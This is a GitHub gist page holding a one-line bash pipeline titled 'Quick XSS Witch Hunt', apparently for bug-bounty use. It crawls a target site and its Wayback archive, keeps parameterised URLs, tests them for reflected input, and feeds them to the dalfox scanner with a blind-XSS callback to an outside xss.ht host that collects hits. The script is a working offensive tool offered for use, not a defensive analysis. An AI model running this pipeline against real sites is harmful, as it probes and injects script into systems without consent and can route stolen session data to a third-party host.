Created
April 5, 2022 07:36
-
-
Save scumdestroy/e94142ffcc1c5e4d55411fc92960d808 to your computer and use it in GitHub Desktop.
Quick XSS Witch Hunt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#/bin/bash | |
hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff | |
|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | dalfox pipe -b https://scumde | |
stroy.xss.ht |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment